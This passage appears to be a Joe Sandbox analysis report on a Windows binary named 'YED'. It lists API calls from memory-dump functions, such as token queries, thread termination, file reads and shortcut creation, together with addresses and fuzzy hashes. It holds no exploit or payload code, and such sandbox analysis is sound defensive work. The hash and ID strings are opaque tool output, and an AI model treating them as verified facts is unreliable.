                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                • String ID: nul
                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                • Opcode ID: b555ba6996a7fb7a451d46ec0feb29eaec7d7696f2648b42ec1f96a70818e942
                                                                                                                                                • Instruction ID: 89aa3f1dc1e44795ac0b89f338f8cc527524b79a1a7e3b14285eeff93526eb68
                                                                                                                                                • Opcode Fuzzy Hash: b555ba6996a7fb7a451d46ec0feb29eaec7d7696f2648b42ec1f96a70818e942
                                                                                                                                                • Instruction Fuzzy Hash: DD21B7395113169FDB60AF68DC84A5A77E8BF85720F200B19FCA1D32D0EBB09874CB10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0021600E: CreateWindowExW.USER32 ref: 0021604C
                                                                                                                                                  • Part of subcall function 0021600E: GetStockObject.GDI32(00000011), ref: 00216060
                                                                                                                                                  • Part of subcall function 0021600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A
                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002A4112
                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002A411F
                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002A412A
                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002A4139
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002A4145
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                                • Opcode ID: 51ba8009c1f34cad59c3d6457efc44dd19cf0db3b0cc3abf152a8d4b3a8aec26
                                                                                                                                                • Instruction ID: 6d8702635ba75fd8d26e82f2de77d40b672d877f26ed0ff20a89703f79ade25c
                                                                                                                                                • Opcode Fuzzy Hash: 51ba8009c1f34cad59c3d6457efc44dd19cf0db3b0cc3abf152a8d4b3a8aec26
                                                                                                                                                • Instruction Fuzzy Hash: CA11B2B215021ABFEF119F64CC85EE77F9DEF09798F004111BA18A6150CAB2DC61DBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0024D7A3: _free.LIBCMT ref: 0024D7CC
                                                                                                                                                • _free.LIBCMT ref: 0024D82D
                                                                                                                                                  • Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
                                                                                                                                                  • Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0
                                                                                                                                                • _free.LIBCMT ref: 0024D838
                                                                                                                                                • _free.LIBCMT ref: 0024D843
                                                                                                                                                • _free.LIBCMT ref: 0024D897
                                                                                                                                                • _free.LIBCMT ref: 0024D8A2
                                                                                                                                                • _free.LIBCMT ref: 0024D8AD
                                                                                                                                                • _free.LIBCMT ref: 0024D8B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                                                                                                • Instruction ID: 8fc96857f7ecb59ef4652d1aeaab4679ca90e73d920aec9bd5a62ee6181de18f
                                                                                                                                                • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                                                                                                • Instruction Fuzzy Hash: 6D115171560B04EBE925BFB1CC47FCBBBDC6F00700F800825B299A6192DA75B5254E50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InterlockedExchange.KERNEL32(008EA3A0,008EA3A0), ref: 0028097B
                                                                                                                                                • EnterCriticalSection.KERNEL32(008EA380,00000000), ref: 0028098D
                                                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 0028099B
                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002809A9
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002809B8
                                                                                                                                                • InterlockedExchange.KERNEL32(008EA3A0,000001F6), ref: 002809C8
                                                                                                                                                • LeaveCriticalSection.KERNEL32(008EA380), ref: 002809CF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                • Opcode ID: e83b34eb3a7dd42124b94ed260005c7cd082d2ff19987743640ed1163a383e8c
                                                                                                                                                • Instruction ID: 300b62fbd328095c5746105533add763bae24ad30333c593c0c32366d6e38aa0
                                                                                                                                                • Opcode Fuzzy Hash: e83b34eb3a7dd42124b94ed260005c7cd082d2ff19987743640ed1163a383e8c
                                                                                                                                                • Instruction Fuzzy Hash: 31F0C932542A12FBD7516FA4EE8DBD6BA29FF06702F502025F602908A1DF75A875CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __allrem.LIBCMT ref: 002400BA
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002400D6
                                                                                                                                                • __allrem.LIBCMT ref: 002400ED
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0024010B
                                                                                                                                                • __allrem.LIBCMT ref: 00240122
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00240140
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                                • Instruction ID: 37cb75cf08a1997f6f9ec1bb4f9f56f0988deb3ae52fc467730a73c58462c78e
                                                                                                                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                                • Instruction Fuzzy Hash: 788149B2A207029BE728AF79DC81B6B73E8AF41724F24453AF915D76C1E770D9608F50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VariantInit.OLEAUT32(00000035), ref: 0026F7B9
                                                                                                                                                • SysAllocString.OLEAUT32(00000001), ref: 0026F860
                                                                                                                                                • VariantCopy.OLEAUT32(0026FA64,00000000), ref: 0026F889
                                                                                                                                                • VariantClear.OLEAUT32(0026FA64), ref: 0026F8AD
                                                                                                                                                • VariantCopy.OLEAUT32(0026FA64,00000000), ref: 0026F8B1
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0026F8BB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859894641-0
                                                                                                                                                • Opcode ID: 4c25a14339625fc8a3776c6f955e5b22b77465ff7aab6f91934d378854c065bb
                                                                                                                                                • Instruction ID: c0195f37c157b697d4a3954fc8fc8577827dbbcabbce01caa0b2b3353d8e7894
                                                                                                                                                • Opcode Fuzzy Hash: 4c25a14339625fc8a3776c6f955e5b22b77465ff7aab6f91934d378854c065bb
                                                                                                                                                • Instruction Fuzzy Hash: 3851D531631310BACF90AF65F995B29B3E8EF55310B208466E905DF291DBB08CE0CB96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 002894E5
                                                                                                                                                • _wcslen.LIBCMT ref: 00289506
                                                                                                                                                • _wcslen.LIBCMT ref: 0028952D
                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00289585
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                • String ID: X
                                                                                                                                                • API String ID: 83654149-3081909835
                                                                                                                                                • Opcode ID: 884aaf4885795c6bbdd258e7a5fd80d3f00df07291ddd90186f81d9a3d2ce006
                                                                                                                                                • Instruction ID: 0c8904f7a558c382974330194a4b26483aed4276ee7537707d1b977ebaa1f0b3
                                                                                                                                                • Opcode Fuzzy Hash: 884aaf4885795c6bbdd258e7a5fd80d3f00df07291ddd90186f81d9a3d2ce006
                                                                                                                                                • Instruction Fuzzy Hash: C0E1D4345243419FD714EF24C881AAEB7E5BF94314F08856DF8899B2A2DB30DD95CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00229241
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 002292A5
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002292C2
                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002292D3
                                                                                                                                                • EndPaint.USER32(?,?), ref: 00229321
                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002671EA
                                                                                                                                                  • Part of subcall function 00229339: BeginPath.GDI32(00000000), ref: 00229357
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3050599898-0
                                                                                                                                                • Opcode ID: 605dfdbb2bf2a62b03a24fe0bc83080e1afa24cd31e8400c82b86f7f72ef3372
                                                                                                                                                • Instruction ID: 80de8c4991cd1908b7444c997b2cb0079139cc138246b5eb94f37807c408df54
                                                                                                                                                • Opcode Fuzzy Hash: 605dfdbb2bf2a62b03a24fe0bc83080e1afa24cd31e8400c82b86f7f72ef3372
                                                                                                                                                • Instruction Fuzzy Hash: D941B230114251EFD710DF64EC88FBA7BB8EF46724F140669F9548B2A2CB7098A5DB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0028080C
                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00280847
                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00280863
                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 002808DC
                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002808F3
                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00280921
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3368777196-0
                                                                                                                                                • Opcode ID: 2a82a56d2db1f31bd556f21ad7a3be24d56147e29b96021baff93f580b84b309
                                                                                                                                                • Instruction ID: 79e137d1de25983374aba0755ca7f9396be9f161f3a296e629f038b37034281b
                                                                                                                                                • Opcode Fuzzy Hash: 2a82a56d2db1f31bd556f21ad7a3be24d56147e29b96021baff93f580b84b309
                                                                                                                                                • Instruction Fuzzy Hash: F8416A71A10205EBDF55AF94EC85AAA7778FF04310F1440B9ED04AA296DB30DE64DFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002A824C
                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 002A8272
                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002A82D1
                                                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 002A82E5
                                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 002A830B
                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002A832F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                • Opcode ID: effbaa2786a66ca9d0af4d5ac865818f523c5323646266302febc098d82731aa
                                                                                                                                                • Instruction ID: 0b5b4f83a12260ee5d7413b87c02fe55f3fa8a45bd04670d35d155df472a6de4
                                                                                                                                                • Opcode Fuzzy Hash: effbaa2786a66ca9d0af4d5ac865818f523c5323646266302febc098d82731aa
                                                                                                                                                • Instruction Fuzzy Hash: 2F418334601685EFDF15CF15E899BB47BE0BB4B714F1841A9EA484F262CF31A865CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00274C95
                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00274CB2
                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00274CEA
                                                                                                                                                • _wcslen.LIBCMT ref: 00274D08
                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00274D10
                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00274D1A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 72514467-0
                                                                                                                                                • Opcode ID: e7933950b5113be365bb4b650e2d8e3c449071f3e1394fbe9a3601208a0c6775
                                                                                                                                                • Instruction ID: cf653dba2aba08c88dc99cd6d8bc24a4c26ae99f64ca6162fccfc5888b7d4496
                                                                                                                                                • Opcode Fuzzy Hash: e7933950b5113be365bb4b650e2d8e3c449071f3e1394fbe9a3601208a0c6775
                                                                                                                                                • Instruction Fuzzy Hash: 3C212C71214111BBEB2AAF79AD09E7B7BACDF46750F10807EF809CA151EF71DC1086A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2
                                                                                                                                                • _wcslen.LIBCMT ref: 0028587B
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00285995
                                                                                                                                                • CoCreateInstance.OLE32(002AFCF8,00000000,00000001,002AFB68,?), ref: 002859AE
                                                                                                                                                • CoUninitialize.OLE32 ref: 002859CC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                • String ID: .lnk
                                                                                                                                                • API String ID: 3172280962-24824748
                                                                                                                                                • Opcode ID: f1cfc8b0290c51b56977da7a44bc662f0718915f843c775501c7a678587b67a3
                                                                                                                                                • Instruction ID: af003eeea7d1bbf661ce61bfe037d55c5d6896c5c864192faf5a1eb8c293761a
                                                                                                                                                • Opcode Fuzzy Hash: f1cfc8b0290c51b56977da7a44bc662f0718915f843c775501c7a678587b67a3
                                                                                                                                                • Instruction Fuzzy Hash: EBD174786286119FC714EF24C48096ABBF2FF99314F148859F8899B3A1DB31EC55CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00270FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00270FCA
                                                                                                                                                  • Part of subcall function 00270FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00270FD6
                                                                                                                                                  • Part of subcall function 00270FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00270FE5
                                                                                                                                                  • Part of subcall function 00270FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00270FEC
                                                                                                                                                  • Part of subcall function 00270FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00271002
                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00271335), ref: 002717AE
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002717BA
                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 002717C1
                                                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 002717DA
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00271335), ref: 002717EE
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 002717F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
